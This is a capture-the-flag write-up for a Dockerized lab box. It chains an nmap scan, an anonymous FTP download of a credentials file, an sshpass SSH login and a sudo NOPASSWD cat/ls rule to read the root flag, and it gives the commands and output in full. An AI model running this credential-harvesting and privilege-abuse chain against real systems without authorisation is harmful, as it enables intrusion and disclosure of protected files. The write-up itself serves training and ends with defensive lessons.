GGEZAF
45.32.121.222OWASPKL{xxx}1. Challenge Overview
Dockerized box solved by chaining three misconfigurations:
Anonymous FTP exposes creds.txt.
Those creds give SSH access as user1337.
sudo -l shows NOPASSWD cat/ls -> read /root/root.txt.
2. Initial Reconnaissance
2.1 Port scan
1nmap -sC -sV -p- -T4 45.32.121.222 -oA ggezaf_nmap_full1PORT STATE SERVICE VERSION221/tcp open ftp vsftpd 3.0.53| ftp-anon: Anonymous FTP login allowed (FTP code 230)4|_-rw-r--r-- 1 ftp ftp 19 May 29 13:06 creds.txt522/tcp open ssh OpenSSH 10.2p1 Ubuntu 2ubuntu3.2665533/tcp open ssh OpenSSH 10.2p1 Ubuntu 2ubuntu3.23. Analysis / Forensics Path
3.1 Browse anonymous FTP and discover creds.txt
Anonymous login is allowed; list the root directory first to see what is exposed.
1printf 'user anonymous anonymous\npwd\nls\nbye\n' | ftp -inv 45.32.121.2221220 (vsFTPd 3.0.5)2230 Login successful.3Remote directory: /4150 Here comes the directory listing.5-rw-r--r-- 1 ftp ftp 19 May 29 13:06 creds.txt6226 Directory send OK.3.2 Download and read creds.txt
1printf 'user anonymous anonymous\nget creds.txt\nbye\n' | ftp -inv 45.32.121.2222cat creds.txt1226 Transfer complete.2user1337:notsoleet4. Exploitation / Recovery
4.1 SSH in with the recovered credential
1sshpass -p 'notsoleet' ssh -p 22 -o StrictHostKeyChecking=no user1337@45.32.121.222 'id; hostname'1uid=1002(user1337) gid=1002(user1337) groups=1002(user1337)2docker-chall-14.2 Enumerate sudo rights, list /root, then read the flag
sudo -l exposes NOPASSWD cat/ls. Use the allowed ls to discover the flag file in /root first, then cat it.
1sshpass -p 'notsoleet' ssh -o StrictHostKeyChecking=no user1337@45.32.121.222 "sudo -l; echo '--- ls /root ---'; sudo /usr/bin/ls -la /root; echo '--- read flag ---'; sudo /usr/bin/cat /root/root.txt"1User user1337 may run the following commands on docker-chall-1:2 (ALL) NOPASSWD: /usr/bin/cat, /usr/bin/ls3--- ls /root ---4total 325drwx------ 1 root root 4096 May 29 13:10 .6-rw------- 1 root root 1423 May 29 13:10 .bash_history7-rw-r--r-- 1 root root 3106 Apr 20 16:46 .bashrc8drwx------ 2 root root 4096 May 29 13:03 .ssh9-r-------- 1 root root 47 May 29 13:08 root.txt10--- read flag ---11OWASPKL{H3re's_th3_G1v3aW4y_500_p0int5_f0r_yA}> Re-validated live on 2026-05-31 via Kali (192.168.1.10): anonymous FTP returned user1337:notsoleet; sudo /usr/bin/ls -la /root listed root.txt (root-owned, 47 bytes); sudo /usr/bin/cat /root/root.txt returned the flag above.
5. Flag
6. Summary of Approach & Key Takeaways
nmap found anonymous FTP + SSH.
FTP leaked creds.txt -> user1337:notsoleet.
SSH login on 22/tcp succeeded.
sudo -l exposed NOPASSWD cat/ls.
sudo cat /root/root.txt returned the flag.
Read-only binaries under sudo NOPASSWD still mean full file disclosure including root flags.
Chained small misconfigs (anon FTP + sudo) collapse straight to root.